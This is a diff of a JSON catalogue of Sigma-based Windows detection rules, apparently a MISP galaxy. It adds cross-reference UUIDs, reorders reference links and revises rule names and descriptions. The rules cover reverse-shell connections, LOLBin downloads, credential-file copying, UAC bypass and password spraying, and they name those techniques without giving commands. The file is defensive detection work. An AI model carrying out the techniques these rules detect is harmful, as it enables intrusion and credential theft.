+38722,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "value": "Download Arbitrary Files Via MSPUB.EXE" }, @@ -30527,6 +38756,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", "value": "Abusing Permissions Using Dsacls" }, @@ -30552,6 +38790,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "value": "Perl Inline Command Execution" }, @@ -30579,6 +38826,15 @@ "attack.t1615" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", "value": "Gpresult Display Group Policy Information" }, @@ -30595,8 +38851,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", "https://github.com/carlospolop/PEASS-ng", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" ], "tags": [ @@ -30631,6 +38887,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "value": "Execution via stordiag.exe" }, @@ -30647,8 +38912,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" @@ -30660,6 +38925,22 @@ "attack.t1021.003" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", "value": "Impacket Lateralization Detection" }, @@ -30686,6 +38967,22 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "value": "Execute Code with Pester.bat" }, @@ -30757,6 +39054,15 @@ "cve.2021.35211" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75578840-9526-4b2a-9462-af469a45e767", "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" }, @@ -30773,9 +39079,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" ], "tags": [ @@ -30783,6 +39089,15 @@ "attack.t1490" ] }, + "related": [ + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "value": "Sensitive Registry Access via Volume Shadow Copy" }, @@ -30807,6 +39122,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "value": "Unusual Parent Process for cmd.exe" }, @@ -30833,6 +39157,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", "value": "Suspicious Base64 Encoded Powershell Invoke" }, @@ -30857,6 +39190,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "value": "File Download with Headless Browser" }, @@ -30882,6 +39224,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "value": "UAC Bypass Using PkgMgr and DISM" }, @@ -30907,6 +39258,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "value": "Lolbin Runexehelper Use As Proxy" }, @@ -30957,6 +39317,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "value": "Winword LOLBIN Usage" }, @@ -30987,6 +39356,22 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", "value": "Sofacy Trojan Loader Activity" }, @@ -31027,8 +39412,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" ], "tags": [ @@ -31052,8 +39437,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" ], "tags": [ @@ -31061,6 +39446,15 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36222790-0d43-4fe8-86e4-674b27809543", "value": "DNS Tunnel Technique from MuddyWater" }, @@ -31085,6 +39479,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4281cb20-2994-4580-aa63-c8b86d019934", "value": "Hiding Files with Attrib.exe" }, @@ -31110,6 +39513,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", "value": "Suspicious Registration via cscript.exe" }, @@ -31224,9 +39636,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ @@ -31234,6 +39646,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" }, @@ -31259,33 +39680,18 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "value": "Sysprep on AppData Folder" }, - { - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/24", - "falsepositive": [ - "Other tools that work with encoded scripts in the command line instead of script files" - ], - "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "value": "Suspicious PowerShell Encoded Command Patterns" - }, { "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "meta": { @@ -31308,6 +39714,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", "value": "Suspicious Desktopimgdownldr Command" }, @@ -31332,6 +39747,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "value": "Wlrmdr Lolbin Use as Launcher" }, @@ -31348,14 +39772,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ @@ -31365,16 +39789,32 @@ "attack.t1218.013" ] }, + "related": [ + { + "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1bae753e-8e52-4055-a66d-2ead90303ca9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", "value": "Rename Mavinject Execution" }, { - "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", "meta": { "author": "FPT.EagleEye, wagga", "creation_date": "2021/03/03", "falsepositive": [ - "Administrative might use this function for checking network connectivity" + "Administrative might use this function to check network connectivity" ], "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", "level": "high", @@ -31382,6 +39822,7 @@ "logsource.product": "windows", "refs": [ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], @@ -31390,8 +39831,17 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "value": "Powershell Reverse Shell Connection" + "value": "Potential Powershell ReverseShell Connection" }, { "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", @@ -31415,9 +39865,42 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", "value": "Execution via Diskshadow.exe" }, + { + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_turn_on_dev_features.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "a383dec4-deec-4e6e-913b-ed9249670848", + "value": "Potential Signing Bypass Via Windows Developer Features" + }, { "description": "Detects netsh commands that configure a port forwarding (PortProxy)", "meta": { @@ -31432,9 +39915,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://www.dfirnotes.net/portproxy_detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" ], "tags": [ @@ -31444,6 +39927,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "value": "Netsh Port Forwarding" }, @@ -31470,6 +39962,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", "value": "MSDT Executed with Suspicious Parent" }, @@ -31524,6 +40025,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "value": "Suspicious PowerShell Command Line" }, @@ -31548,6 +40058,15 @@ "attack.t1555.004" ] }, + "related": [ + { + "dest-uuid": "d336b553-5da9-46ca-98a8-0b23f49fb447", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "value": "Suspicious Key Manager Access" }, @@ -31564,8 +40083,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virusradar.com/en/Win32_Kasidet.AD/description", "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" ], "tags": [ @@ -31573,6 +40092,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "value": "Netsh Program Allowed with Suspcious Location" }, @@ -31589,8 +40117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1207671369963646976", "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" ], "tags": [ @@ -31604,6 +40132,29 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "value": "Operation Wocao Activity" }, @@ -31629,6 +40180,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "502b42de-4306-40b4-9596-6f590c81f073", "value": "Local Accounts Discovery" }, @@ -31645,12 +40205,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" ], "tags": [ @@ -31661,6 +40221,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", "value": "New Lolbin Process by Office Applications" }, @@ -31677,9 +40260,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" ], "tags": [ @@ -31699,6 +40282,71 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "value": "HTML Help Shell Spawn" }, @@ -31754,13 +40402,29 @@ "attack.s0404" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "value": "Copying Sensitive Files with Credential Data" }, { "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", "meta": { - "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "author": "Florian Roth, Nasreddine Bencherchali", "creation_date": "2020/07/03", "falsepositive": [ "Unknown" @@ -31770,10 +40434,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://twitter.com/max_mal_/status/1542461200797163522", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" ], "tags": [ @@ -31781,6 +40445,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "value": "Suspicious Curl Usage on Windows" }, @@ -31821,9 +40494,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ @@ -31831,6 +40504,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", "value": "Password Spraying Attempts Using Dsacls" }, @@ -31847,9 +40529,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", "https://github.com/h3v0x/CVE-2021-26084_Confluence", "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", 